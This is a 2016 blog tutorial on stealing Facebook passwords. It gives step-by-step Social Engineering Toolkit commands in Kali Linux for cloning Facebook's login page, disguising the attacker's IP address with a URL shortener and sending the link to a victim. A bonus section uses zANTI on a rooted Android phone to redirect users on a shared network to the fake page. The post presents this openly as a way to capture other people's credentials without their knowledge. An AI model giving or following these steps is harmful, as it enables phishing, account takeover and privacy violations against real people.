body { background-image: url('https://thehacktoday.com/wp-content/uploads/2015/10/hacking-2.jpg') !important; }

Thursday 29 September 2016

Hacking Facebook id with credential harvestor

How to hack facebook using Kali linux : Credentials Harvester Attack 



Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.






WHAT IS CREDENTIALS HARVESTER ATTACK ?

Credential Harvester attack is as easy as 3 2 1 . It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

LET'S DO THIS!!!!!!!!!


STEPS:


1. Fire up kali linux on your machine. If you haven't install the kali follow this guide for assistance. After booting kali open a terminal.

2. Type this command in the kali linux terminal.

"setoolkit"

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then
  
                '2'(Website Attack Vectors) then

                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your Internal ip address)
          
          set:webattack>Enter the url to clone: www.facebook.com


7.  Shorten your ip address with tinyurl.com to make it look like a genuine url and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. ]

Bonus :

If u want to get password quicker without sending any links to the victim. Then Use the below method

Requirments :


  • A rooted android phone
  • Zanti installed (get it from here)
  • A wireless network
  • Bit of patience
1. Open zanti in rooted android.

2. tap on any ip then tap on "redirect http"

3. Type your internal ip of kali in the box.

4. Done!!!!!!


Now the user if trying to open Facebook will get redirect to our fake facebook page and he will give us our password without being known.


Comment down below for any problems.

SHARE THIS IF YOU LIKE IT :)

Happy Hacking
If You Enjoyed This Post Please Take 5 Seconds To Share It.

0 comments:

Copyright Tips-N-Tricks 2012-2016. Powered by Blogger.